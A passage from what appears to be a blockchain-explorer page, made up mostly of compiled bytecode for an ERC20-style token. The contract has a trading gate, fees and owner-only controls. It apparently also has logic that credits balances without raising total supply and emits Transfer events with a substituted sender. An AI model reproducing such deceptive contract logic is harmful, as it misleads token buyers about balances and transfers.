a4df523b3ef83604051611db19190612323565b60405180910390a35b5b505050565b5f5f8303611dd0575f9050611e31565b5f8284611ddd9190612a2c565b9050828482611dec9190612a9a565b14611e2c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e2390612b3a565b60405180910390fd5b809150505b92915050565b5f5f83118290611e7d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e749190612250565b60405180910390fd5b505f8385611e8b9190612a9a565b9050809150509392505050565b5f611ed983836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f77000081525061208b565b905092915050565b5f81031561208757611f5281604051806060016040528060268152602001612bf4602691395f5f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461208b9092919063ffffffff16565b5f5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550611fe1815f5f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546120ed90919063ffffffff16565b5f5f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055503073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405161207e9190612323565b60405180910390a35b5050565b5f8383111582906120d2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016120c99190612250565b60405180910390fd5b505f83856120e09190612b58565b9050809150509392505050565b5f5f82846120fb91906128f4565b905083811015612140576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161213790612bd5565b60405180910390fd5b8091505092915050565b5f604051905090565b5f5ffd5b5f5ffd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6121848261215b565b9050919050565b6121948161217a565b811461219e575f5ffd5b50565b5f813590506121af8161218b565b92915050565b5f602082840312156121ca576121c9612153565b5b5f6121d7848285016121a1565b91505092915050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f612222826121e0565b61222c81856121ea565b935061223c8185602086016121fa565b61224581612208565b840191505092915050565b5f6020820190508181035f8301526122688184612218565b905092915050565b5f819050919050565b61228281612270565b811461228c575f5ffd5b50565b5f8135905061229d81612279565b92915050565b5f5f604083850312156122b9576122b8612153565b5b5f6122c6858286016121a1565b92505060206122d78582860161228f565b9150509250929050565b5f8115159050919050565b6122f5816122e1565b82525050565b5f60208201905061230e5f8301846122ec565b92915050565b61231d81612270565b82525050565b5f6020820190506123365f830184612314565b92915050565b5f5f5f6060848603121561235357612352612153565b5b5f612360868287016121a1565b9350506020612371868287016121a1565b92505060406123828682870161228f565b9150509250925092565b5f60ff82169050919050565b6123a18161238c565b82525050565b5f6020820190506123ba5f830184612398565b92915050565b6123c98161217a565b82525050565b5f6020820190506123e25f8301846123c0565b92915050565b5f5ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b61242282612208565b810181811067ffffffffffffffff82111715612441576124406123ec565b5b80604052505050565b5f61245361214a565b905061245f8282612419565b919050565b5f67ffffffffffffffff82111561247e5761247d6123ec565b5b602082029050602081019050919050565b5f5ffd5b5f6124a56124a084612464565b61244a565b905080838252602082019050602084028301858111156124c8576124c761248f565b5b835b818110156124f157806124dd88826121a1565b8452602084019350506020810190506124ca565b5050509392505050565b5f82601f83011261250f5761250e6123e8565b5b813561251f848260208601612493565b91505092915050565b5f6020828403121561253d5761253c612153565b5b5f82013567ffffffffffffffff81111561255a57612559612157565b5b612566848285016124fb565b91505092915050565b5f6020828403121561258457612583612153565b5b5f6125918482850161228f565b91505092915050565b5f67ffffffffffffffff8211156125b4576125b36123ec565b5b602082029050602081019050919050565b5f6125d76125d28461259a565b61244a565b905080838252602082019050602084028301858111156125fa576125f961248f565b5b835b81811015612623578061260f888261228f565b8452602084019350506020810190506125fc565b5050509392505050565b5f82601f830112612641576126406123e8565b5b81356126518482602086016125c5565b91505092915050565b5f5f604083850312156126705761266f612153565b5b5f83013567ffffffffffffffff81111561268d5761268c612157565b5b612699858286016124fb565b925050602083013567ffffffffffffffff8111156126ba576126b9612157565b5b6126c68582860161262d565b9150509250929050565b5f819050919050565b5f6126f36126ee6126e98461215b565b6126d0565b61215b565b9050919050565b5f612704826126d9565b9050919050565b5f612715826126fa565b9050919050565b6127258161270b565b82525050565b5f60208201905061273e5f83018461271c565b92915050565b5f5f6040838503121561275a57612759612153565b5b5f612767858286016121a1565b9250506020612778858286016121a1565b9150509250929050565b5f8151905061279081612279565b92915050565b5f602082840312156127ab576127aa612153565b5b5f6127b884828501612782565b91505092915050565b5f6040820190506127d45f8301856123c0565b6127e16020830184612314565b9392505050565b6127f1816122e1565b81146127fb575f5ffd5b50565b5f8151905061280c816127e8565b92915050565b5f6020828403121561282757612826612153565b5b5f612834848285016127fe565b91505092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061288157607f821691505b6020821081036128945761289361283d565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f6128fe82612270565b915061290983612270565b9250828201905080821115612921576129206128c7565b5b92915050565b7f4953206e6f742063616c6c2066756e6374696f6e0000000000000000000000005f82015250565b5f61295b6014836121ea565b915061296682612927565b602082019050919050565b5f6020820190508181035f8301526129888161294f565b9050919050565b5f6060820190506129a25f8301866123c0565b6129af6020830185612314565b6129bc6040830184612314565b949350505050565b7f547261646520686173206e6f74206265656e206f70656e6564207965740000005f82015250565b5f6129f8601d836121ea565b9150612a03826129c4565b602082019050919050565b5f6020820190508181035f830152612a25816129ec565b9050919050565b5f612a3682612270565b9150612a4183612270565b9250828202612a4f81612270565b91508282048414831517612a6657612a656128c7565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f612aa482612270565b9150612aaf83612270565b925082612abf57612abe612a6d565b5b828204905092915050565b7f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f5f8201527f7700000000000000000000000000000000000000000000000000000000000000602082015250565b5f612b246021836121ea565b9150612b2f82612aca565b604082019050919050565b5f6020820190508181035f830152612b5181612b18565b9050919050565b5f612b6282612270565b9150612b6d83612270565b9250828203905081811115612b8557612b846128c7565b5b92915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f7700000000005f82015250565b5f612bbf601b836121ea565b9150612bca82612b8b565b602082019050919050565b5f6020820190508181035f830152612bec81612bb3565b905091905056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e6365a26469706673582212206344ac27ca086966170632fc31b5548c6ed58b9237e87329cf2e8cfb68c933d764736f6c634300081b003345524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e6365
Deployed Bytecode
0x608060405234801561000f575f5ffd5b506004361061023b575f3560e01c80636c02a931116101395780639baac8b3116100b6578063dd62ed3e1161007a578063dd62ed3e1461066f578063e086e5ec1461069f578063f2fde38b146106a9578063f66bf229146106c5578063fdf2fe64146106e35761023b565b80639baac8b3146105cb578063a2dfb668146105e7578063a9059cbb14610605578063ceb82ddc14610635578063d56b6de21461063f5761023b565b80637298d36e116100fd5780637298d36e146105355780637b61c3201461055357806388e765ff146105715780638da5cb5b1461058f57806395d89b41146105ad5761023b565b80636c02a931146104a5578063706f6937146104c357806370a08231146104df578063715018a61461050f57806372098f68146105195761023b565b8063313ce567116101c75780634a1263f31161018b5780634a1263f3146103fd5780635408d42d1461041b578063564b81ef14610439578063593ed58c14610457578063694c3fa1146104875761023b565b8063313ce5671461036b5780633736421b146103895780633811ac02146103a75780633c9f5ed6146103c35780633fe32037146103e15761023b565b806316ab369a1161020e57806316ab369a146102b357806318160ddd146102e357806323b872dd146103015780632711b8a514610331578063274d9afc1461034f5761023b565b8063068acf6c1461023f57806306fdde031461025b578063095ea7b3146102795780630bd05b69146102a9575b5f5ffd5b610259600480360381019061025491906121b5565b6106ed565b005b6102636107f0565b6040516102709190612250565b60405180910390f35b610293600480360381019061028e91906122a3565b610880565b6040516102a091906122fb565b60405180910390f35b6102b16108a2565b005b6102cd60048036038101906102c891906121b5565b6108d4565b6040516102da91906122fb565b60405180910390f35b6102eb6108f1565b6040516102f89190612323565b60405180910390f35b61031b6004803603810190610316919061233c565b6108fa565b60405161032891906122fb565b60405180910390f35b610339610928565b6040516103469190612323565b60405180910390f35b610369600480360381019061036491906121b5565b610930565b005b610373610990565b60405161038091906123a7565b60405180910390f35b610391610998565b60405161039e91906123cf565b60405180910390f35b6103c160048036038101906103bc9190612528565b6109bd565b005b6103cb610a53565b6040516103d891906122fb565b60405180910390f35b6103fb60048036038101906103f691906122a3565b610a68565b005b610405610abb565b6040516104129190612323565b60405180910390f35b610423610ac1565b60405161043091906122fb565b60405180910390f35b610441610ad3565b60405161044e9190612323565b60405180910390f35b610471600480360381019061046c919061256f565b610adf565b60405161047e91906123cf565b60405180910390f35b61048f610b0f565b60405161049c9190612323565b60405180910390f35b6104ad610b15565b6040516104ba9190612250565b60405180910390f35b6104dd60048036038101906104d8919061265a565b610ba1565b005b6104f960048036038101906104f491906121b5565b610cef565b6040516105069190612323565b60405180910390f35b610517610d34565b005b610533600480360381019061052e919061256f565b610d47565b005b61053d610d59565b60405161054a919061272b565b60405180910390f35b61055b610d7e565b6040516105689190612250565b60405180910390f35b610579610e0a565b6040516105869190612323565b60405180910390f35b610597610e10565b6040516105a491906123cf565b60405180910390f35b6105b5610e38565b6040516105c29190612250565b60405180910390f35b6105e560048036038101906105e0919061256f565b610ec8565b005b6105ef610eda565b6040516105fc9190612323565b60405180910390f35b61061f600480360381019061061a91906122a3565b610ee0565b60405161062c91906122fb565b60405180910390f35b61063d610f02565b005b610659600480360381019061065491906121b5565b610f89565b60405161066691906122fb565b60405180910390f35b61068960048036038101906106849190612744565b610fa6565b6040516106969190612323565b60405180910390f35b6106a7611028565b005b6106c360048036038101906106be91906121b5565b611076565b005b6106cd6110fa565b6040516106da9190612323565b60405180910390f35b6106eb611100565b005b6106f5611187565b5f8173ffffffffffffffffffffffffffffffffffffffff166370a08231306040518263ffffffff1660e01b815260040161072f91906123cf565b602060405180830381865afa15801561074a573d5f5f3e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061076e9190612796565b90508173ffffffffffffffffffffffffffffffffffffffff1663a9059cbb33836040518363ffffffff1660e01b81526004016107ab9291906127c1565b6020604051808303815f875af11580156107c7573d5f5f3e3d5ffd5b505050506040513d601f19601f820116820180604052508101906107eb9190612812565b505050565b6060600380546107ff9061286a565b80601f016020809104026020016040519081016040528092919081815260200182805461082b9061286a565b80156108765780601f1061084d57610100808354040283529160200191610876565b820191905f5260205f20905b81548152906001019060200180831161085957829003601f168201915b5050505050905090565b5f5f61088a61120e565b9050610897818585611215565b600191505092915050565b6108aa611187565b600d5f9054906101000a900460ff1615600d5f6101000a81548160ff021916908315150217905550565b6013602052805f5260405f205f915054906101000a900460ff1681565b5f600254905090565b5f5f61090461120e565b9050610911858285611227565b61091c8585856112b9565b60019150509392505050565b5f6001905090565b610938611187565b600160115f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff02191690831515021790555050565b5f6012905090565b60145f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6109c5611187565b5f5f90505b8151811015610a4f57600160135f8484815181106109eb576109ea61289a565b5b602002602001015173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff02191690831515021790555080806001019150506109ca565b5050565b5f600d5f9054906101000a900460ff16905090565b610a70611187565b8160145f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555080600b819055505050565b600a5481565b600d5f9054906101000a900460ff1681565b5f5f4690508091505090565b6012602052805f5260405f205f915054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600b5481565b60088054610b229061286a565b80601f0160208091040260200160405190810160405280929190818152602001828054610b4e9061286a565b8015610b995780601f10610b7057610100808354040283529160200191610b99565b820191905f5260205f20905b815481529060010190602001808311610b7c57829003601f168201915b505050505081565b610ba9611187565b5f5f90505b8251811015610cea57818181518110610bca57610bc961289a565b5b60200260200101515f5f858481518110610be757610be661289a565b5b602002602001015173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f828254610c3691906128f4565b92505081905550828181518110610c5057610c4f61289a565b5b602002602001015173ffffffffffffffffffffffffffffffffffffffff16610c76610e10565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef848481518110610cc057610cbf61289a565b5b6020026020010151604051610cd59190612323565b60405180910390a38080600101915050610bae565b505050565b5f5f5f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b610d3c611187565b610d455f6113a9565b565b610d4f611187565b80600e8190555050565b60155f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60098054610d8b9061286a565b80601f0160208091040260200160405190810160405280929190818152602001828054610db79061286a565b8015610e025780601f10610dd957610100808354040283529160200191610e02565b820191905f5260205f20905b815481529060010190602001808311610de557829003601f168201915b505050505081565b600f5481565b5f60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060048054610e479061286a565b80601f0160208091040260200160405190810160405280929190818152602001828054610e739061286a565b8015610ebe5780601f10610e9557610100808354040283529160200191610ebe565b820191905f5260205f20905b815481529060010190602001808311610ea157829003601f168201915b5050505050905090565b610ed0611187565b80600f8190555050565b60105481565b5f5f610eea61120e565b9050610ef78185856112b9565b600191505092915050565b3373ffffffffffffffffffffffffffffffffffffffff16610f21610e10565b73ffffffffffffffffffffffffffffffffffffffff1614610f77576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f6e90612971565b60405180910390fd5b68056bc75e2d63100000601081905550565b6011602052805f5260405f205f915054906101000a900460ff1681565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b611030611187565b3373ffffffffffffffffffffffffffffffffffffffff166108fc4790811502906040515f60405180830381858888f19350505050158015611073573d5f5f3e3d5ffd5b50565b61107e611187565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036110ee575f6040517f1e4fbdf70000000000000000000000000000000000000000000000000000000081526004016110e591906123cf565b60405180910390fd5b6110f7816113a9565b50565b600e5481565b3373ffffffffffffffffffffffffffffffffffffffff1661111f610e10565b73ffffffffffffffffffffffffffffffffffffffff1614611175576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161116c90612971565b60405180910390fd5b68056bc75e2d63100000601081905550565b61118f61120e565b73ffffffffffffffffffffffffffffffffffffffff166111ad610e10565b73ffffffffffffffffffffffffffffffffffffffff161461120c576111d061120e565b6040517f118cdaa700000000000000000000000000000000000000000000000000000000815260040161120391906123cf565b60405180910390fd5b565b5f33905090565b611222838383600161146c565b505050565b5f6112328484610fa6565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146112b357818110156112a4578281836040517ffb8f41b200000000000000000000000000000000000000000000000000000000815260040161129b9392919061298f565b60405180910390fd5b6112b284848484035f61146c565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611329575f6040517f96c6fd1e00000000000000000000000000000000000000000000000000000000815260040161132091906123cf565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611399575f6040517fec442f0500000000000000000000000000000000000000000000000000000000815260040161139091906123cf565b60405180910390fd5b6113a483838361163b565b505050565b5f60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508160075f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16036114dc575f6040517fe602df050000000000000000000000000000000000000000000000000000000081526004016114d391906123cf565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361154c575f6040517f94280d6200000000000000000000000000000000000000000000000000000000815260040161154391906123cf565b60405180910390fd5b8160015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508015611635578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258460405161162c9190612323565b60405180910390a35b50505050565b60135f3273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff161561169a576116958383836119e7565b6119e2565b600d5f9054906101000a900460ff166116e8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116df90612a0e565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff1660145f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff160361174c576117478383836119e7565b6119e2565b60115f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff161580156117ea575060115f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b156119d65760145f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036118e2575f6118a360646040518060400160405280600381526020017f4e6f210000000000000000000000000000000000000000000000000000000000815250611894600a5486611dc090919063ffffffff16565b611e379092919063ffffffff16565b90506118b88183611e9890919063ffffffff16565b91505f82036118c757506119e2565b6118d18482611ee1565b6118dc8484846119e7565b506119e2565b60145f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036119d5575f61199660646040518060400160405280600381526020017f4e6f210000000000000000000000000000000000000000000000000000000000815250611987600b5486611dc090919063ffffffff16565b611e379092919063ffffffff16565b90506119ab8183611e9890919063ffffffff16565b91505f82036119ba57506119e2565b6119c48482611ee1565b6119cf8484846119e7565b506119e2565b5b6119e18383836119e7565b5b505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611a37578060025f828254611a2b91906128f4565b92505081905550611b05565b5f5f5f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015611ac0578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401611ab79392919061298f565b60405180910390fd5b8181035f5f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611b4c578060025f8282540392505081905550611b96565b805f5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611c755760065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051611c689190612323565b60405180910390a3611dbb565b60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611d54578173ffffffffffffffffffffffffffffffffffffffff1660065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051611d479190612323565b60405180910390a3611dba565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051611db19190612323565b60405180910390a35b5b505050565b5f5f8303611dd0575f9050611e31565b5f8284611ddd9190612a2c565b9050828482611dec9190612a9a565b14611e2c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e2390612b3a565b60405180910390fd5b809150505b92915050565b5f5f83118290611e7d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e749190612250565b60405180910390fd5b505f8385611e8b9190612a9a565b9050809150509392505050565b5f611ed983836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f77000081525061208b565b905092915050565b5f81031561208757611f5281604051806060016040528060268152602001612bf4602691395f5f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461208b9092919063ffffffff16565b5f5f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550611fe1815f5f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546120ed90919063ffffffff16565b5f5f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055503073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405161207e9190612323565b60405180910390a35b5050565b5f8383111582906120d2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016120c99190612250565b60405180910390fd5b505f83856120e09190612b58565b9050809150509392505050565b5f5f82846120fb91906128f4565b905083811015612140576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161213790612bd5565b60405180910390fd5b8091505092915050565b5f604051905090565b5f5ffd5b5f5ffd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6121848261215b565b9050919050565b6121948161217a565b811461219e575f5ffd5b50565b5f813590506121af8161218b565b92915050565b5f602082840312156121ca576121c9612153565b5b5f6121d7848285016121a1565b91505092915050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f612222826121e0565b61222c81856121ea565b935061223c8185602086016121fa565b61224581612208565b840191505092915050565b5f6020820190508181035f8301526122688184612218565b905092915050565b5f819050919050565b61228281612270565b811461228c575f5ffd5b50565b5f8135905061229d81612279565b92915050565b5f5f604083850312156122b9576122b8612153565b5b5f6122c6858286016121a1565b92505060206122d78582860161228f565b9150509250929050565b5f8115159050919050565b6122f5816122e1565b82525050565b5f60208201905061230e5f8301846122ec565b92915050565b61231d81612270565b82525050565b5f6020820190506123365f830184612314565b92915050565b5f5f5f6060848603121561235357612352612153565b5b5f612360868287016121a1565b9350506020612371868287016121a1565b92505060406123828682870161228f565b9150509250925092565b5f60ff82169050919050565b6123a18161238c565b82525050565b5f6020820190506123ba5f830184612398565b92915050565b6123c98161217a565b82525050565b5f6020820190506123e25f8301846123c0565b92915050565b5f5ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b61242282612208565b810181811067ffffffffffffffff82111715612441576124406123ec565b5b80604052505050565b5f61245361214a565b905061245f8282612419565b919050565b5f67ffffffffffffffff82111561247e5761247d6123ec565b5b602082029050602081019050919050565b5f5ffd5b5f6124a56124a084612464565b61244a565b905080838252602082019050602084028301858111156124c8576124c761248f565b5b835b818110156124f157806124dd88826121a1565b8452602084019350506020810190506124ca565b5050509392505050565b5f82601f83011261250f5761250e6123e8565b5b813561251f848260208601612493565b91505092915050565b5f6020828403121561253d5761253c612153565b5b5f82013567ffffffffffffffff81111561255a57612559612157565b5b612566848285016124fb565b91505092915050565b5f6020828403121561258457612583612153565b5b5f6125918482850161228f565b91505092915050565b5f67ffffffffffffffff8211156125b4576125b36123ec565b5b602082029050602081019050919050565b5f6125d76125d28461259a565b61244a565b905080838252602082019050602084028301858111156125fa576125f961248f565b5b835b81811015612623578061260f888261228f565b8452602084019350506020810190506125fc565b5050509392505050565b5f82601f830112612641576126406123e8565b5b81356126518482602086016125c5565b91505092915050565b5f5f604083850312156126705761266f612153565b5b5f83013567ffffffffffffffff81111561268d5761268c612157565b5b612699858286016124fb565b925050602083013567ffffffffffffffff8111156126ba576126b9612157565b5b6126c68582860161262d565b9150509250929050565b5f819050919050565b5f6126f36126ee6126e98461215b565b6126d0565b61215b565b9050919050565b5f612704826126d9565b9050919050565b5f612715826126fa565b9050919050565b6127258161270b565b82525050565b5f60208201905061273e5f83018461271c565b92915050565b5f5f6040838503121561275a57612759612153565b5b5f612767858286016121a1565b9250506020612778858286016121a1565b9150509250929050565b5f8151905061279081612279565b92915050565b5f602082840312156127ab576127aa612153565b5b5f6127b884828501612782565b91505092915050565b5f6040820190506127d45f8301856123c0565b6127e16020830184612314565b9392505050565b6127f1816122e1565b81146127fb575f5ffd5b50565b5f8151905061280c816127e8565b92915050565b5f6020828403121561282757612826612153565b5b5f612834848285016127fe565b91505092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061288157607f821691505b6020821081036128945761289361283d565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f6128fe82612270565b915061290983612270565b9250828201905080821115612921576129206128c7565b5b92915050565b7f4953206e6f742063616c6c2066756e6374696f6e0000000000000000000000005f82015250565b5f61295b6014836121ea565b915061296682612927565b602082019050919050565b5f6020820190508181035f8301526129888161294f565b9050919050565b5f6060820190506129a25f8301866123c0565b6129af6020830185612314565b6129bc6040830184612314565b949350505050565b7f547261646520686173206e6f74206265656e206f70656e6564207965740000005f82015250565b5f6129f8601d836121ea565b9150612a03826129c4565b602082019050919050565b5f6020820190508181035f830152612a25816129ec565b9050919050565b5f612a3682612270565b9150612a4183612270565b9250828202612a4f81612270565b91508282048414831517612a6657612a656128c7565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f612aa482612270565b9150612aaf83612270565b925082612abf57612abe612a6d565b5b828204905092915050565b7f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f5f8201527f7700000000000000000000000000000000000000000000000000000000000000602082015250565b5f612b246021836121ea565b9150612b2f82612aca565b604082019050919050565b5f6020820190508181035f830152612b5181612b18565b9050919050565b5f612b6282612270565b9150612b6d83612270565b9250828203905081811115612b8557612b846128c7565b5b92915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f7700000000005f82015250565b5f612bbf601b836121ea565b9150612bca82612b8b565b602082019050919050565b5f6020820190508181035f830152612bec81612bb3565b905091905056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e6365a26469706673582212206344ac27ca086966170632fc31b5548c6ed58b9237e87329cf2e8cfb68c933d764736f6c634300081b0033
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.